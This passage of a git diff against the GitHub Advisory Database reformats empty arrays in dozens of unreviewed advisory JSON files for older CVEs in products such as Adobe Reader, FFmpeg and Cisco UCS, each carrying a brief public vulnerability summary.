"ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jj9x-9ww4-hpw8/GHSA-jj9x-9ww4-hpw8.json b/advisories/unreviewed/2022/05/GHSA-jj9x-9ww4-hpw8/GHSA-jj9x-9ww4-hpw8.json index b6e26f94e8c..2e25ea9811b 100644 --- a/advisories/unreviewed/2022/05/GHSA-jj9x-9ww4-hpw8/GHSA-jj9x-9ww4-hpw8.json +++ b/advisories/unreviewed/2022/05/GHSA-jj9x-9ww4-hpw8/GHSA-jj9x-9ww4-hpw8.json @@ -7,12 +7,8 @@ "CVE-2013-1002" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jjp3-m764-2w7x/GHSA-jjp3-m764-2w7x.json b/advisories/unreviewed/2022/05/GHSA-jjp3-m764-2w7x/GHSA-jjp3-m764-2w7x.json index 2bbc86daa8e..054fc5cb8fc 100644 --- a/advisories/unreviewed/2022/05/GHSA-jjp3-m764-2w7x/GHSA-jjp3-m764-2w7x.json +++ b/advisories/unreviewed/2022/05/GHSA-jjp3-m764-2w7x/GHSA-jjp3-m764-2w7x.json @@ -7,12 +7,8 @@ "CVE-2011-0589" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0563 and CVE-2011-0606.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jm66-2qvw-vg4v/GHSA-jm66-2qvw-vg4v.json b/advisories/unreviewed/2022/05/GHSA-jm66-2qvw-vg4v/GHSA-jm66-2qvw-vg4v.json index 130d9c6ad17..cfcac616f35 100644 --- a/advisories/unreviewed/2022/05/GHSA-jm66-2qvw-vg4v/GHSA-jm66-2qvw-vg4v.json +++ b/advisories/unreviewed/2022/05/GHSA-jm66-2qvw-vg4v/GHSA-jm66-2qvw-vg4v.json @@ -7,12 +7,8 @@ "CVE-2012-1339" ], "details": "The Fabric Interconnect component in Cisco Unified Computing System (UCS) 2.0 allows remote attackers to cause a denial of service (process crash) via an attempted SSH session, aka Bug ID CSCtt94543.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jmxm-vpv4-jjr2/GHSA-jmxm-vpv4-jjr2.json b/advisories/unreviewed/2022/05/GHSA-jmxm-vpv4-jjr2/GHSA-jmxm-vpv4-jjr2.json index 0e311901f83..b39e71735df 100644 --- a/advisories/unreviewed/2022/05/GHSA-jmxm-vpv4-jjr2/GHSA-jmxm-vpv4-jjr2.json +++ b/advisories/unreviewed/2022/05/GHSA-jmxm-vpv4-jjr2/GHSA-jmxm-vpv4-jjr2.json @@ -7,12 +7,8 @@ "CVE-2010-3568" ], "details": "Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, and 1.4.2_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable downstream vendor that this is a race condition related to deserialization.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -156,9 +152,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jq7f-3xjx-846w/GHSA-jq7f-3xjx-846w.json b/advisories/unreviewed/2022/05/GHSA-jq7f-3xjx-846w/GHSA-jq7f-3xjx-846w.json index 79b8047871f..bbf9301cdb7 100644 --- a/advisories/unreviewed/2022/05/GHSA-jq7f-3xjx-846w/GHSA-jq7f-3xjx-846w.json +++ b/advisories/unreviewed/2022/05/GHSA-jq7f-3xjx-846w/GHSA-jq7f-3xjx-846w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jqhx-h33h-g3qg/GHSA-jqhx-h33h-g3qg.json b/advisories/unreviewed/2022/05/GHSA-jqhx-h33h-g3qg/GHSA-jqhx-h33h-g3qg.json index 036e0af60f1..87906dc7a07 100644 --- a/advisories/unreviewed/2022/05/GHSA-jqhx-h33h-g3qg/GHSA-jqhx-h33h-g3qg.json +++ b/advisories/unreviewed/2022/05/GHSA-jqhx-h33h-g3qg/GHSA-jqhx-h33h-g3qg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jqmp-hjg9-vhwh/GHSA-jqmp-hjg9-vhwh.json b/advisories/unreviewed/2022/05/GHSA-jqmp-hjg9-vhwh/GHSA-jqmp-hjg9-vhwh.json index fb02d440cc2..404166c3b96 100644 --- a/advisories/unreviewed/2022/05/GHSA-jqmp-hjg9-vhwh/GHSA-jqmp-hjg9-vhwh.json +++ b/advisories/unreviewed/2022/05/GHSA-jqmp-hjg9-vhwh/GHSA-jqmp-hjg9-vhwh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jvqh-cqv8-3792/GHSA-jvqh-cqv8-3792.json b/advisories/unreviewed/2022/05/GHSA-jvqh-cqv8-3792/GHSA-jvqh-cqv8-3792.json index 7c8de163966..14b383fca18 100644 --- a/advisories/unreviewed/2022/05/GHSA-jvqh-cqv8-3792/GHSA-jvqh-cqv8-3792.json +++ b/advisories/unreviewed/2022/05/GHSA-jvqh-cqv8-3792/GHSA-jvqh-cqv8-3792.json @@ -7,12 +7,8 @@ "CVE-2008-4715" ], "details": "SQL injection vulnerability in the Jpad (com_jpad) 1.0 component for Joomla! allows remote attackers to execute arbitrary SQL commands via the cid parameter to index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jw22-cx5q-mmw5/GHSA-jw22-cx5q-mmw5.json b/advisories/unreviewed/2022/05/GHSA-jw22-cx5q-mmw5/GHSA-jw22-cx5q-mmw5.json index 61f274f700c..048b758dc4f 100644 --- a/advisories/unreviewed/2022/05/GHSA-jw22-cx5q-mmw5/GHSA-jw22-cx5q-mmw5.json +++ b/advisories/unreviewed/2022/05/GHSA-jw22-cx5q-mmw5/GHSA-jw22-cx5q-mmw5.json @@ -7,12 +7,8 @@ "CVE-2013-3380" ], "details": "The administrative web interface in the Access Control Server in Cisco Secure Access Control System (ACS) does not properly restrict the report view page, which allows remote authenticated users to obtain sensitive information via a direct request, aka Bug ID CSCue79279.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jw32-248w-622p/GHSA-jw32-248w-622p.json b/advisories/unreviewed/2022/05/GHSA-jw32-248w-622p/GHSA-jw32-248w-622p.json index 6437771a5d9..7d469198270 100644 --- a/advisories/unreviewed/2022/05/GHSA-jw32-248w-622p/GHSA-jw32-248w-622p.json +++ b/advisories/unreviewed/2022/05/GHSA-jw32-248w-622p/GHSA-jw32-248w-622p.json @@ -7,12 +7,8 @@ "CVE-2010-3402" ], "details": "Untrusted search path vulnerability in IDM Computer Solutions UltraEdit 16.20.0.1009, 16.10.0.1036, and probably other versions allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse dwmapi.dll that is located in the same folder as a bin, cpp, css, c, dat, hpp, html, h, ini, java, log, mak, php, prj, txt, or xml file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jx77-rw95-4j5h/GHSA-jx77-rw95-4j5h.json b/advisories/unreviewed/2022/05/GHSA-jx77-rw95-4j5h/GHSA-jx77-rw95-4j5h.json index e8e34ed4f52..6a031f02be4 100644 --- a/advisories/unreviewed/2022/05/GHSA-jx77-rw95-4j5h/GHSA-jx77-rw95-4j5h.json +++ b/advisories/unreviewed/2022/05/GHSA-jx77-rw95-4j5h/GHSA-jx77-rw95-4j5h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jxhj-q7g3-3ppj/GHSA-jxhj-q7g3-3ppj.json b/advisories/unreviewed/2022/05/GHSA-jxhj-q7g3-3ppj/GHSA-jxhj-q7g3-3ppj.json index d529b6bbe14..f0c2e7122f5 100644 --- a/advisories/unreviewed/2022/05/GHSA-jxhj-q7g3-3ppj/GHSA-jxhj-q7g3-3ppj.json +++ b/advisories/unreviewed/2022/05/GHSA-jxhj-q7g3-3ppj/GHSA-jxhj-q7g3-3ppj.json @@ -7,12 +7,8 @@ "CVE-2010-3628" ], "details": "Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3632, and CVE-2010-3658.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jxr9-j9xp-6p4j/GHSA-jxr9-j9xp-6p4j.json b/advisories/unreviewed/2022/05/GHSA-jxr9-j9xp-6p4j/GHSA-jxr9-j9xp-6p4j.json index bb6a7e05c15..8bb000cf4d2 100644 --- a/advisories/unreviewed/2022/05/GHSA-jxr9-j9xp-6p4j/GHSA-jxr9-j9xp-6p4j.json +++ b/advisories/unreviewed/2022/05/GHSA-jxr9-j9xp-6p4j/GHSA-jxr9-j9xp-6p4j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m245-xcm9-7cpw/GHSA-m245-xcm9-7cpw.json b/advisories/unreviewed/2022/05/GHSA-m245-xcm9-7cpw/GHSA-m245-xcm9-7cpw.json index 14f4e8b8ebc..a0c4c8375f8 100644 --- a/advisories/unreviewed/2022/05/GHSA-m245-xcm9-7cpw/GHSA-m245-xcm9-7cpw.json +++ b/advisories/unreviewed/2022/05/GHSA-m245-xcm9-7cpw/GHSA-m245-xcm9-7cpw.json @@ -7,12 +7,8 @@ "CVE-2011-0561" ], "details": "Adobe Flash Player before 10.2.152.26 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0559, CVE-2011-0560, CVE-2011-0571, CVE-2011-0572, CVE-2011-0573, CVE-2011-0574, CVE-2011-0578, CVE-2011-0607, and CVE-2011-0608.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m24m-q32v-p8v9/GHSA-m24m-q32v-p8v9.json b/advisories/unreviewed/2022/05/GHSA-m24m-q32v-p8v9/GHSA-m24m-q32v-p8v9.json index 53b7c389872..47670d581ac 100644 --- a/advisories/unreviewed/2022/05/GHSA-m24m-q32v-p8v9/GHSA-m24m-q32v-p8v9.json +++ b/advisories/unreviewed/2022/05/GHSA-m24m-q32v-p8v9/GHSA-m24m-q32v-p8v9.json @@ -7,12 +7,8 @@ "CVE-2013-2276" ], "details": "The avcodec_decode_audio4 function in utils.c in libavcodec in FFmpeg before 1.1.3 does not verify the decoding state before proceeding with certain skip operations, which allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted audio data.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m2qv-8rfq-vrg4/GHSA-m2qv-8rfq-vrg4.json b/advisories/unreviewed/2022/05/GHSA-m2qv-8rfq-vrg4/GHSA-m2qv-8rfq-vrg4.json index c113af0bd50..46448a72674 100644 --- a/advisories/unreviewed/2022/05/GHSA-m2qv-8rfq-vrg4/GHSA-m2qv-8rfq-vrg4.json +++ b/advisories/unreviewed/2022/05/GHSA-m2qv-8rfq-vrg4/GHSA-m2qv-8rfq-vrg4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m398-9jm3-95r6/GHSA-m398-9jm3-95r6.json b/advisories/unreviewed/2022/05/GHSA-m398-9jm3-95r6/GHSA-m398-9jm3-95r6.json index 7f59fbf78fc..914f2e8e260 100644 --- a/advisories/unreviewed/2022/05/GHSA-m398-9jm3-95r6/GHSA-m398-9jm3-95r6.json +++ b/advisories/unreviewed/2022/05/GHSA-m398-9jm3-95r6/GHSA-m398-9jm3-95r6.json @@ -7,12 +7,8 @@ "CVE-2011-2444" ], "details": "Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to inject arbitrary web script or HTML via a crafted URL, related to a \"universal cross-site scripting issue,\" as exploited in the wild in September 2011.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m3q5-pr2m-cfvx/GHSA-m3q5-pr2m-cfvx.json b/advisories/unreviewed/2022/05/GHSA-m3q5-pr2m-cfvx/GHSA-m3q5-pr2m-cfvx.json index 81884289e3c..af506813f62 100644 --- a/advisories/unreviewed/2022/05/GHSA-m3q5-pr2m-cfvx/GHSA-m3q5-pr2m-cfvx.json +++ b/advisories/unreviewed/2022/05/GHSA-m3q5-pr2m-cfvx/GHSA-m3q5-pr2m-cfvx.json @@ -7,12 +7,8 @@ "CVE-2012-2785" ], "details": "Multiple unspecified vulnerabilities in libavcodec/wmalosslessdec.c in FFmpeg before 0.11 have unknown impact and attack vectors, related to (1) \"some subframes only encode some channels\" or (2) a large order value.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m5pv-qhf4-7jxp/GHSA-m5pv-qhf4-7jxp.json b/advisories/unreviewed/2022/05/GHSA-m5pv-qhf4-7jxp/GHSA-m5pv-qhf4-7jxp.json index f18967f9064..94fb9d3103c 100644 --- a/advisories/unreviewed/2022/05/GHSA-m5pv-qhf4-7jxp/GHSA-m5pv-qhf4-7jxp.json +++ b/advisories/unreviewed/2022/05/GHSA-m5pv-qhf4-7jxp/GHSA-m5pv-qhf4-7jxp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m5wp-qwch-hf84/GHSA-m5wp-qwch-hf84.json b/advisories/unreviewed/2022/05/GHSA-m5wp-qwch-hf84/GHSA-m5wp-qwch-hf84.json index 9e883b0b730..4be4815f2b9 100644 --- a/advisories/unreviewed/2022/05/GHSA-m5wp-qwch-hf84/GHSA-m5wp-qwch-hf84.json +++ b/advisories/unreviewed/2022/05/GHSA-m5wp-qwch-hf84/GHSA-m5wp-qwch-hf84.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m632-42g2-v3pj/GHSA-m632-42g2-v3pj.json b/advisories/unreviewed/2022/05/GHSA-m632-42g2-v3pj/GHSA-m632-42g2-v3pj.json index 5ee6925da1c..2f5f1a8c93f 100644 --- a/advisories/unreviewed/2022/05/GHSA-m632-42g2-v3pj/GHSA-m632-42g2-v3pj.json +++ b/advisories/unreviewed/2022/05/GHSA-m632-42g2-v3pj/GHSA-m632-42g2-v3pj.json @@ -7,12 +7,8 @@ "CVE-2011-0564" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows use weak permissions for unspecified files, which allows attackers to gain privileges via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m6wc-h767-27c3/GHSA-m6wc-h767-27c3.json b/advisories/unreviewed/2022/05/GHSA-m6wc-h767-27c3/GHSA-m6wc-h767-27c3.json index 323d7ff431f..dfa6fe6fc8c 100644 --- a/advisories/unreviewed/2022/05/GHSA-m6wc-h767-27c3/GHSA-m6wc-h767-27c3.json +++ b/advisories/unreviewed/2022/05/GHSA-m6wc-h767-27c3/GHSA-m6wc-h767-27c3.json @@ -7,12 +7,8 @@ "CVE-2010-2883" ], "details": "Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m762-q9c2-gwpj/GHSA-m762-q9c2-gwpj.json b/advisories/unreviewed/2022/05/GHSA-m762-q9c2-gwpj/GHSA-m762-q9c2-gwpj.json index 826456c11c6..40eff53e6a0 100644 --- a/advisories/unreviewed/2022/05/GHSA-m762-q9c2-gwpj/GHSA-m762-q9c2-gwpj.json +++ b/advisories/unreviewed/2022/05/GHSA-m762-q9c2-gwpj/GHSA-m762-q9c2-gwpj.json @@ -7,12 +7,8 @@ "CVE-2011-0585" ], "details": "Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0565.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m768-jh9w-6566/GHSA-m768-jh9w-6566.json b/advisories/unreviewed/2022/05/GHSA-m768-jh9w-6566/GHSA-m768-jh9w-6566.json index f64dbc27e6d..669daf0a66e 100644 --- a/advisories/unreviewed/2022/05/GHSA-m768-jh9w-6566/GHSA-m768-jh9w-6566.json +++ b/advisories/unreviewed/2022/05/GHSA-m768-jh9w-6566/GHSA-m768-jh9w-6566.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m77w-c6pc-5856/GHSA-m77w-c6pc-5856.json b/advisories/unreviewed/2022/05/GHSA-m77w-c6pc-5856/GHSA-m77w-c6pc-5856.json index 137575d26b8..128bffd6b5e 100644 --- a/advisories/unreviewed/2022/05/GHSA-m77w-c6pc-5856/GHSA-m77w-c6pc-5856.json +++ b/advisories/unreviewed/2022/05/GHSA-m77w-c6pc-5856/GHSA-m77w-c6pc-5856.json @@ -7,12 +7,8 @@ "CVE-2013-5591" ], "details": "Unspecified vulnerability in the browser engine in Mozilla Firefox before 25.0, Firefox ESR 24.x before 24.1, Thunderbird before 24.1, and SeaMonkey before 2.22 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m7mh-m68x-wqxx/GHSA-m7mh-m68x-wqxx.json b/advisories/unreviewed/2022/05/GHSA-m7mh-m68x-wqxx/GHSA-m7mh-m68x-wqxx.json index 369fe2554bb..619cd8e689e 100644 --- a/advisories/unreviewed/2022/05/GHSA-m7mh-m68x-wqxx/GHSA-m7mh-m68x-wqxx.json +++ b/advisories/unreviewed/2022/05/GHSA-m7mh-m68x-wqxx/GHSA-m7mh-m68x-wqxx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m7pq-9x4x-q4q8/GHSA-m7pq-9x4x-q4q8.json b/advisories/unreviewed/2022/05/GHSA-m7pq-9x4x-q4q8/GHSA-m7pq-9x4x-q4q8.json index 9f6cb18cde0..896c4843aaa 100644 --- a/advisories/unreviewed/2022/05/GHSA-m7pq-9x4x-q4q8/GHSA-m7pq-9x4x-q4q8.json +++ b/advisories/unreviewed/2022/05/GHSA-m7pq-9x4x-q4q8/GHSA-m7pq-9x4x-q4q8.json @@ -7,12 +7,8 @@ "CVE-2011-0515" ], "details": "KisKrnl.sys 2011.1.13.89 and earlier in Kingsoft AntiVirus 2011 SP5.2 allows local users to cause a denial of service (crash) via a crafted request that is not properly handled by the KiFastCallEntry hook.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m7rg-q5hp-9vwf/GHSA-m7rg-q5hp-9vwf.json b/advisories/unreviewed/2022/05/GHSA-m7rg-q5hp-9vwf/GHSA-m7rg-q5hp-9vwf.json index 996f3daeb70..7f33d4f859f 100644 --- a/advisories/unreviewed/2022/05/GHSA-m7rg-q5hp-9vwf/GHSA-m7rg-q5hp-9vwf.json +++ b/advisories/unreviewed/2022/05/GHSA-m7rg-q5hp-9vwf/GHSA-m7rg-q5hp-9vwf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m7rp-jrcg-r626/GHSA-m7rp-jrcg-r626.json b/advisories/unreviewed/2022/05/GHSA-m7rp-jrcg-r626/GHSA-m7rp-jrcg-r626.json index 0c477ba9d7a..8d0fa3d723a 100644 --- a/advisories/unreviewed/2022/05/GHSA-m7rp-jrcg-r626/GHSA-m7rp-jrcg-r626.json +++ b/advisories/unreviewed/2022/05/GHSA-m7rp-jrcg-r626/GHSA-m7rp-jrcg-r626.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m95g-vf62-j7fh/GHSA-m95g-vf62-j7fh.json b/advisories/unreviewed/2022/05/GHSA-m95g-vf62-j7fh/GHSA-m95g-vf62-j7fh.json index 0291ad7bbd3..a7fe63e23a9 100644 --- a/advisories/unreviewed/2022/05/GHSA-m95g-vf62-j7fh/GHSA-m95g-vf62-j7fh.json +++ b/advisories/unreviewed/2022/05/GHSA-m95g-vf62-j7fh/GHSA-m95g-vf62-j7fh.json @@ -7,12 +7,8 @@ "CVE-2008-5550" ], "details": "Open redirect vulnerability in console/faces/jsp/login/BeginLogin.jsp in Sun Java Web Console 3.0.2 through 3.0.5 and Solaris 10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the redirect_url parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m9p9-mh4f-qxmq/GHSA-m9p9-mh4f-qxmq.json b/advisories/unreviewed/2022/05/GHSA-m9p9-mh4f-qxmq/GHSA-m9p9-mh4f-qxmq.json index d1ddfea3b52..a5e0d612cb6 100644 --- a/advisories/unreviewed/2022/05/GHSA-m9p9-mh4f-qxmq/GHSA-m9p9-mh4f-qxmq.json +++ b/advisories/unreviewed/2022/05/GHSA-m9p9-mh4f-qxmq/GHSA-m9p9-mh4f-qxmq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mc58-7vj9-xp2m/GHSA-mc58-7vj9-xp2m.json b/advisories/unreviewed/2022/05/GHSA-mc58-7vj9-xp2m/GHSA-mc58-7vj9-xp2m.json index f9bb5f9fcb0..0d30006408f 100644 --- a/advisories/unreviewed/2022/05/GHSA-mc58-7vj9-xp2m/GHSA-mc58-7vj9-xp2m.json +++ b/advisories/unreviewed/2022/05/GHSA-mc58-7vj9-xp2m/GHSA-mc58-7vj9-xp2m.json @@ -7,12 +7,8 @@ "CVE-2012-2772" ], "details": "Unspecified vulnerability in the ff_rv34_decode_frame function in libavcodec/rv34.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to \"width/height changing with frame threading.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mc64-v3mw-vq6w/GHSA-mc64-v3mw-vq6w.json b/advisories/unreviewed/2022/05/GHSA-mc64-v3mw-vq6w/GHSA-mc64-v3mw-vq6w.json index 51c022cf0ae..5283bb2e1ce 100644 --- a/advisories/unreviewed/2022/05/GHSA-mc64-v3mw-vq6w/GHSA-mc64-v3mw-vq6w.json +++ b/advisories/unreviewed/2022/05/GHSA-mc64-v3mw-vq6w/GHSA-mc64-v3mw-vq6w.json @@ -7,12 +7,8 @@ "CVE-2010-3625" ], "details": "Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code via unspecified vectors, related to a \"prefix protocol handler vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mfgp-7r52-jcjh/GHSA-mfgp-7r52-jcjh.json b/advisories/unreviewed/2022/05/GHSA-mfgp-7r52-jcjh/GHSA-mfgp-7r52-jcjh.json index 0495d69b8de..f50ca63af45 100644 --- a/advisories/unreviewed/2022/05/GHSA-mfgp-7r52-jcjh/GHSA-mfgp-7r52-jcjh.json +++ b/advisories/unreviewed/2022/05/GHSA-mfgp-7r52-jcjh/GHSA-mfgp-7r52-jcjh.json @@ -13,9 